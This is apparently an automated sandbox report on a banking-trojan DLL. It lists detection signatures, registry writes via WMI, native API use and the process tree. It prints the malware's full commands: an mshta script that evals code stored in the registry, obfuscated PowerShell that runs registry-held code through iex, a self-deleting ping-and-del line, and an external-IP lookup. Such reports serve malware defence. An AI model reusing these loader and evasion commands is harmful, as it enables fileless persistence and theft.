Source: Yara match File source: 00000003.00000003.359541703.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359590748.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6104, type: MEMORYSTR
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F278F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_00F278F2

System Summary
barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: 61ee6edf7de65.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B50CB2 1_2_04B50CB2
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B42CB8 1_2_04B42CB8
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4F4D0 1_2_04B4F4D0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B51DEA 1_2_04B51DEA
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B32D25 1_2_04B32D25
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3F641 1_2_04B3F641
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B368B2 1_2_04B368B2
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B501A5 1_2_04B501A5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B43924 1_2_04B43924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F280D0 3_2_00F280D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F24BB3 3_2_00F24BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F2436E 3_2_00F2436E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A01D92 3_2_05A01D92
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A01DEA 3_2_05A01DEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E2D25 3_2_059E2D25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A00CB2 3_2_05A00CB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F2CB8 3_2_059F2CB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FF4D0 3_2_059FF4D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A01418 3_2_05A01418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EF641 3_2_059EF641
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A001A5 3_2_05A001A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F3924 3_2_059F3924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E68B2 3_2_059E68B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A07358 3_2_05A07358
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B49499 CreateProcessAsUserW, 1_2_04B49499
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3D4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_04B3D4F4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3E4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_04B3E4DC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3B45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_04B3B45A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B44560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_04B44560
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4BEBC GetProcAddress,NtCreateSection,memset, 1_2_04B4BEBC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4D6E3 NtQueryInformationProcess, 1_2_04B4D6E3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B53E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_04B53E7D
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3A7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 1_2_04B3A7FE
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B40FE0 NtMapViewOfSection, 1_2_04B40FE0
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3AFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_04B3AFD1
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B36F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_04B36F70
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B470AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_04B470AC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B3ECE9 NtGetContextThread,RtlNtStatusToDosError, 1_2_04B3ECE9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B52588 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_04B52588
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B31D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_04B31D70
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B33EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_04B33EBE
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4F0CC memset,NtQueryInformationProcess, 1_2_04B4F0CC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4A1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_04B4A1FC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_04B4595B
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_04B4630F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F24AAF NtMapViewOfSection, 3_2_00F24AAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F22F8D GetProcAddress,NtCreateSection,memset, 3_2_00F22F8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F2373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_00F2373D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F282F5 NtQueryVirtualMemory, 3_2_00F282F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_059F4560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_059EE4DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059ED4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_059ED4F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_059EB45A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_059EAFD1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 3_2_059EA7FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F0FE0 NtMapViewOfSection, 3_2_059F0FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_059E6F70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FBEBC GetProcAddress,NtCreateSection,memset, 3_2_059FBEBC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FD6E3 NtQueryInformationProcess, 3_2_059FD6E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A03E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_05A03E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_059F70AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A02588 NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_05A02588
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_059E1D70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059EECE9 NtGetContextThread,RtlNtStatusToDosError, 3_2_059EECE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059E3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 3_2_059E3EBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_059FA1FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_059F595B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059FF0CC memset,NtQueryInformationProcess, 3_2_059FF0CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_059F630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_059F630F
Sample file is different than original file name gathered from version info
Source: 61ee6edf7de65.dll Binary or memory string: OriginalFilenameAnhydrou> vs 61ee6edf7de65.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: 61ee6edf7de65.dll Virustotal: Detection: 24%
Source: 61ee6edf7de65.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wulb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wulb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Vn1t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vn1t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9AF.tmp" "c:\Users\user\AppData\Local\Temp\hddjt5kh\CSCAC4C40391E0044BAAD217F7E1F4E48A.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC843.tmp" "c:\Users\user\AppData\Local\Temp\32ysuxeg\CSCDD69F677ABA1437DBA6EE4792C92D38A.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCEBB.tmp" "c:\Users\user\AppData\Local\Temp\qmanv25g\CSC83689403A124ABD8F80AE4A2C14BFB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE6D7.tmp" "c:\Users\user\AppData\Local\Temp\vn3zgr4g\CSCD86376609B0744ABB56928FEBE923C3.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\442E.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9AF.tmp" "c:\Users\user\AppData\Local\Temp\hddjt5kh\CSCAC4C40391E0044BAAD217F7E1F4E48A.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC843.tmp" "c:\Users\user\AppData\Local\Temp\32ysuxeg\CSCDD69F677ABA1437DBA6EE4792C92D38A.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCEBB.tmp" "c:\Users\user\AppData\Local\Temp\qmanv25g\CSC83689403A124ABD8F80AE4A2C14BFB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE6D7.tmp" "c:\Users\user\AppData\Local\Temp\vn3zgr4g\CSCD86376609B0744ABB56928FEBE923C3.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\442E.bi1"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220124 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5g4e2etf.ffb.ps1 Jump to behavior
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@48/34@6/6
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
